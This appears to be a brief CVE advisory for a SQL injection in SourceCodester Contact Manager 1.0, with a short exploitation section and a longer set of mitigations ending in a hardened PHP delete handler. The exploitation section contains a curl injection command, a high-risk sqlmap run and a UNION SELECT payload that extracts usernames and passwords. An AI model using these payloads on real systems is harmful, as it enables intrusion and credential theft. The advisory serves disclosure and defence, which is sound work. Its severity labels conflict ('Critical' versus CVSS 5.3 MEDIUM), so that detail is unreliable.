How the CVE Works:
CVE-2025-1168 is a critical SQL injection vulnerability in SourceCodester Contact Manager with Export to VCF 1.0. The flaw resides in the `/endpoint/delete-contact.php` file, where the `contact` parameter is not safely handled before it reaches the database query. An attacker can manipulate this parameter to inject SQL, potentially gaining unauthorized access to the database. The vulnerability is exploitable remotely over the network, and a public exploit is available, which increases the risk of widespread attacks. The CVSS 4.0 score of 5.3 (MEDIUM) reflects the potential impact: data leakage, data manipulation, and unauthorized access.
DailyCVE Form:
Platform: SourceCodester Contact Manager
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 02/10/2025
What Undercode Say:
Exploitation:
1. Exploit Command:
curl -X POST "http://target.com/endpoint/delete-contact.php" -d "contact=1' OR '1'='1"
2. Exploit URL:
Replace `target.com` with the vulnerable server’s domain or IP.
3. Manual Testing:
Use tools like Burp Suite or SQLmap to automate SQL injection detection:
sqlmap -u "http://target.com/endpoint/delete-contact.php?contact=1" --risk=3 --level=5
4. Payload Example:
contact=1' UNION SELECT username, password FROM users--
Protection:
1. Input Validation:
Sanitize and validate all user inputs to prevent malicious SQL queries.
2. Prepared Statements:
Use parameterized queries in the application code:
$stmt = $conn->prepare("DELETE FROM contacts WHERE id = ?"); // placeholder instead of string concatenation
$stmt->bind_param("i", $contact_id);                        // "i" binds the value as an integer
$stmt->execute();
3. Web Application Firewall (WAF):
Deploy a WAF to filter out SQL injection attempts.
4. Patch Management:
Regularly update the software to the latest version to mitigate known vulnerabilities.
5. Database Permissions:
Restrict database user permissions to minimize damage in case of exploitation.
6. Logging and Monitoring:
Enable detailed logging to detect and respond to suspicious activities.
7. Security Headers:
Implement HTTP security headers to harden the application:
[http]
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
[/http]
8. Vulnerability Scanning:
Use tools like Nessus or OpenVAS to scan for vulnerabilities regularly.
9. Code Review:
Conduct regular code reviews to identify and fix security flaws.
10. Disclosure Reporting:
Report vulnerabilities to the vendor and follow responsible disclosure practices.
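The following is an added example, not the SourceCodester project's code: a hardened delete handler that combines items 1, 2 and 5 above (integer validation of `contact`, a parameterized DELETE, and a least-privilege database user). It assumes an existing mysqli connection in `$conn` and a `contacts` table with an integer primary key `id`.

```php
<?php
// Added example (not the project's own code): hardened replacement for the
// delete handler described above. Assumes a mysqli connection in $conn,
// opened with a database user that holds only DELETE on `contacts`, and an
// integer primary key column `id`.
declare(strict_types=1);

header('Content-Type: application/json');

function delete_contact(mysqli $conn, $raw): array
{
    // Allow only a positive integer. Payloads such as "1' OR '1'='1" or a
    // UNION SELECT fail this check before any SQL is built.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // Log the rejection so repeated attempts show up in monitoring (item 6).
        error_log('delete-contact: rejected non-integer contact parameter');
        return ['ok' => false, 'error' => 'invalid contact id'];
    }

    // Parameterized query: the value is bound, never interpolated into the
    // statement text, so it can only ever be compared as an integer.
    $stmt = $conn->prepare('DELETE FROM contacts WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();

    return ['ok' => $deleted === 1, 'deleted' => $deleted];
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    echo json_encode(['ok' => false, 'error' => 'POST required']);
    exit;
}

echo json_encode(delete_contact($conn, $_POST['contact'] ?? null));
```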
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1168
Extra Source Hub:
Undercode